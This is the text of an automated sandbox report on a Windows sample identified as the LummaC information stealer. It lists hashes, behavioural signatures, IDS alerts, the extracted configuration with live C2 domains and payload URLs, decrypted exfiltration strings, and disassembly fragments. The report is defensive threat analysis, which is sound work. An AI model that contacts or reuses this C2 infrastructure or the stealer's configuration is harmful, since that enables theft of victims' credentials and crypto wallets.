Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
L7GNkeVm5e.exe

Overview

General Information

Sample name:L7GNkeVm5e.exe
renamed because original name is a hash value
Original sample name:f7db525dd98ee5fbdc9c11d59b93985b.exe
Analysis ID:1589517
MD5:f7db525dd98ee5fbdc9c11d59b93985b
SHA1:1d722eb6df789efffa180f73bc9f3799d91115f1
SHA256:1385f8cf1b5f14beabab56b3208665cea34dd1933d4c6679cf1157287e4ec379
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • L7GNkeVm5e.exe (PID: 768 cmdline: "C:\Users\user\Desktop\L7GNkeVm5e.exe" MD5: F7DB525DD98EE5FBDC9C11D59B93985B)
    • EB86.tmp.exe (PID: 412 cmdline: "C:\Users\user\AppData\Local\Temp\EB86.tmp.exe" MD5: 08494E6A1E788EA3259955A4524FDFEC)
      • WerFault.exe (PID: 3472 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 412 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["soundtappysk.shop", "apporholis.shop", "handscreamny.shop", "chipdonkeruz.shop", "skidjazzyric.click", "femalsabler.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.4539762016.0000000000629000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0xf88:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2358816622.0000000000602000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x1760:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000002.00000002.2359118882.0000000002160000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    No Sigma rule has matched
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:06.451964+010020283713Unknown Traffic192.168.2.549706104.102.49.254443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.725642+010020590351Domain Observed Used for C2 Detected192.168.2.5654371.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.755307+010020590371Domain Observed Used for C2 Detected192.168.2.5520661.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.736408+010020590391Domain Observed Used for C2 Detected192.168.2.5551441.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.714240+010020590411Domain Observed Used for C2 Detected192.168.2.5612071.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.766501+010020590431Domain Observed Used for C2 Detected192.168.2.5579541.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.777221+010020590491Domain Observed Used for C2 Detected192.168.2.5557631.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.685065+010020590881Domain Observed Used for C2 Detected192.168.2.5631651.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.700683+010020590511Domain Observed Used for C2 Detected192.168.2.5650281.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:05.746939+010020590571Domain Observed Used for C2 Detected192.168.2.5599721.1.1.153UDP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:01.923189+010028032742Potentially Bad Traffic192.168.2.549704172.67.179.207443TCP
    2025-01-12T17:52:02.739573+010028032742Potentially Bad Traffic192.168.2.549705176.113.115.1980TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-12T17:52:06.933921+010028586661Domain Observed Used for C2 Detected192.168.2.549706104.102.49.254443TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: L7GNkeVm5e.exeAvira: detected
    Source: https://robinsharez.shop:443/apiAvira URL Cloud: Label: malware
    Source: https://post-to-me.com/fh/0Avira URL Cloud: Label: malware
    Source: https://versersleep.shop:443/apiAvira URL Cloud: Label: malware
    Source: https://chipdonkeruz.shop:443/apihAvira URL Cloud: Label: malware
    Source: https://crowdwarek.shop:443/apiAvira URL Cloud: Label: malware
    Source: https://apporholis.shop:443/apiiPAvira URL Cloud: Label: malware
    Source: https://skidjazzyric.click:443/apiAvira URL Cloud: Label: malware
    Source: 2.2.EB86.tmp.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["soundtappysk.shop", "apporholis.shop", "handscreamny.shop", "chipdonkeruz.shop", "skidjazzyric.click", "femalsabler.shop", "crowdwarek.shop", "versersleep.shop", "robinsharez.shop"], "Build id": "4h5VfH--"}
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeReversingLabs: Detection: 50%
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeReversingLabs: Detection: 50%
    Source: L7GNkeVm5e.exeVirustotal: Detection: 39%Perma Link
    Source: L7GNkeVm5e.exeReversingLabs: Detection: 50%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\ScreenUpdateSync[1].exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeJoe Sandbox ML: detected
    Source: L7GNkeVm5e.exeJoe Sandbox ML: detected
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: robinsharez.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: handscreamny.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: chipdonkeruz.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: versersleep.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: crowdwarek.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: apporholis.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: femalsabler.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: soundtappysk.shop
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: skidjazzyric.click
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: TeslaBrowser/5.5
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Screen Resoluton:
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: - Physical Installed Memory:
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: Workgroup: -
    Source: 00000002.00000002.2358524386.0000000000400000.00000040.00000001.01000000.00000006.sdmpString decryptor: 4h5VfH--

    Compliance

    barindex
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeUnpacked PE file: 0.2.L7GNkeVm5e.exe.400000.0.unpack
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeUnpacked PE file: 2.2.EB86.tmp.exe.400000.0.unpack
    Source: L7GNkeVm5e.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
    Source: unknownHTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.5:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
    Source: Binary string: .pDB~B source: L7GNkeVm5e.exe
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_004389E2 FindFirstFileExW,0_2_004389E2
    Source: C:\Users\user\Desktop\L7GNkeVm5e.exeCode function: 0_2_02138C49 FindFirstFileExW,0_2_02138C49
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, edx2_2_0040B2B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h2_2_00419840
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]2_2_0040A05C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_00427070
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx2_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0043B870
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0042D830
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_0043F0E0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041B882
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp eax2_2_004418A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041B173
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0042B170
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0041A900
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041B184
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then test esi, esi2_2_0043C9A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0041B243
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042EA62
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]2_2_00402210
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0040AA32
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx eax, byte ptr [ebp+esi-00001458h]2_2_00425AF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00428280
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0041F2A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, eax2_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebp, eax2_2_00405AB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042EB5F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]2_2_0042BB00
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041BB21
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h2_2_00441B20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0041AB2A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]2_2_0040C334
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+72B923DBh]2_2_0040C3EC
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, edx2_2_0042DBF0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp ecx2_2_0040D334
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00422380
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]2_2_0041BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h2_2_0042BBA0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042EBA1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00440BAB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0042EBB3
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h2_2_00441BB0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h2_2_00441C40
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00442470
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_00426C76
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov eax, edi2_2_0041C400
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov edx, ecx2_2_00417405
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_00414C20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h2_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0044042D
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0041B484
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [esi], cx2_2_00427490
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_00425D6A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_00438520
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh2_2_00442D20
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then push edi2_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]2_2_0043C5A0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0042B652
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0041B667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]2_2_00418672
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_00409E09
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_00407620
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp ecx2_2_0040CEC7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]2_2_00416ED0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]2_2_0041BEE1
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0041AEFF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov esi, ecx2_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_00415720
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]2_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0040DFE2
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]2_2_00408F90
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh2_2_004427B0
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx+eax-03DAF14Eh]2_2_0216E249
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [eax], cl2_2_0216E249
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [edi+eax]2_2_0216A2C3
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h2_2_0219F347
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0217B3DA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0217B3EB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0216A070
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov esi, ecx2_2_021760EF
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000128h]2_2_02177137
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp ecx2_2_0216D12E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+3A4EC517h]2_2_0217C148
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0217B166
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, byte ptr [esp+ebx+08h]2_2_021691F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+14h], 00000000h2_2_021A21EA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp ecx2_2_0216D59B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov eax, edi2_2_0217C667
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [ebp-00000248h], 24272637h2_2_021A0694
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_021A0694
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_021A26D7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [esi], cx2_2_021876F7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], cl2_2_0217B6EB
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], al2_2_0217773F
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebx, byte ptr [edx]2_2_02198787
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]2_2_02162477
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [ecx], al2_2_0217B4AA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_021884E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movsx eax, byte ptr [esi+ecx]2_2_0217F507
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ebp, byte ptr [esp+edi+72B923DBh]2_2_0216C59B
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_021825E7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 0EF2A4EDh2_2_021A2A17
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, edx2_2_0216BA6C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]2_2_0218DA97
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 1ED645B4h2_2_02179AA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [esp+3Ch], edx2_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov edx, ecx2_2_0219BAD7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx esi, byte ptr [esp+edi+17ECFBF3h]2_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov edx, ecx2_2_02177AE4
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [edi], al2_2_0217BAE9
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov word ptr [eax], cx2_2_0217AB67
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 53585096h2_2_02186BA7
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, dword ptr [0044C548h]2_2_02178809
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then push edi2_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+edi+53BD8A12h]2_2_0219C807
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]2_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]2_2_02167887
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_0218B8B5
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h2_2_021758FA
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0218EE1A
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_021A0E12
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov byte ptr [esi], cl2_2_0218EE08
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov dword ptr [ebx], 00000022h2_2_0218BE07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-000000E2h]2_2_0217BE2C
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ebx, edx2_2_0218DE57
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then cmp dword ptr [ebp+edi*8+00h], 4B884A2Eh2_2_021A2F87
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then test esi, esi2_2_0219CC07
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then jmp eax2_2_021A1C3E
    Source: C:\Users\user\AppData\Local\Temp\EB86.tmp.exeCode function: 4x nop then mov ecx, eax2_2_0216AC99
